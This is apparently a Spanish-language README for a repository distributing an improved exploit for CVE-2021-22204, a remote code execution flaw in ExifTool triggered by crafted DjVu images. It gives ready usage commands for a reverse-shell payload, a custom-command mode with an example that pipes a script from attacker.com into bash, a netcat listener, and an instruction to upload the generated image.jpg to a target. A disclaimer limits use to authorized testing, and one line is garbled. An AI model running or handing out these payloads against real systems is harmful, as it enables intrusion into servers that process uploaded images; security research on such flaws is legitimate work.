
Exploit de RCE en ExifTool (CVE-2021-22204) - versión mejorada, sin dependencia de exiftool
Un proof-of-concept mejorado para CVE-2021-22204, una vulnerabilidad en las versiones 7.44 a 12.23 de ExifTool que permite la ejecución arbitraria de código al procesar archivos DjVu maliciosos.
Este es un trabajo derivado. La vulnerabilidad y el exploit original no son míos.
| Rol | Quién |
|---|
| Vulnerabilidad descubierta por | William Bowling (@wcbowling), reportada a través del programa de recompensas por errores de GitLab — abril de 2021 |
| PoC original por | UNICORD (NicPWNs & Dev-Yeoj) |
| Modificaciones en este repositorio por | d4ytox |
La neutralización incorrecta de los datos del usuario en el formato de archivo DjVu en las versiones 7.44 a 12.23 de ExifTool permite la ejecución arbitraria de código al analizar una imagen maliciosa. Este exploit genera un archivo de imagen malicioso que, al ser procesado por una versión vulnerable de ExifTool, ejecuta código controlado por el atacante.
Basado en UNICORDev/exploit-CVE-2021-22204:
exiftool -config para incrustar la carga útil, lo que falla si tu propio ExifTool está parcheado (v12.24+). Esta versión construye una carga útil DjVu pura usando únicamente djvumake.\c)djvulibre-binEstos son cambios de ingeniería sobre un exploit existente. No se reclama ninguna investigación de vulnerabilidades.
sudo apt install djvulibre-bin
Shell inversa:
python3 exploit.py -s <LHOST> <LPORT>
Comando personalizado:
python3 exploit.py -c "id > /tmp/pwned"
Ejemplos:
# Generar carga útil de shell inversa
python3 exploit.py -s 192.168.1.100 4444
# Generar carga útil de ejecución de comandos
python3 exploit.py -c "curl http://attacker.com/shell.sh | bash"
# Iniciar listener y esperar la conexión
nc -nlvp 4444
El exploit genera image.jpg - súbelo a un objetivo donde ExifTool lo procese.
Esta herramienta se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas.
El autor no es responsable de ningún uso indebido o daño causado por esta herramienta. Usa este exploit solo contra sistemas que te pertenezcan o para los que tengas permiso explícito por escrito para realizar pruebas.
El acceso no autorizado a sistemas informáticos es ilegal y está penado por la ley. Úsalo de forma responsable.
MIT, aplicada solo a las modificaciones de este repositorio. El PoC original no tiene licencia, por lo que conserva todos los derechos reservados por sus autores. Consulta LICENSE para ver el aviso de atribución completo.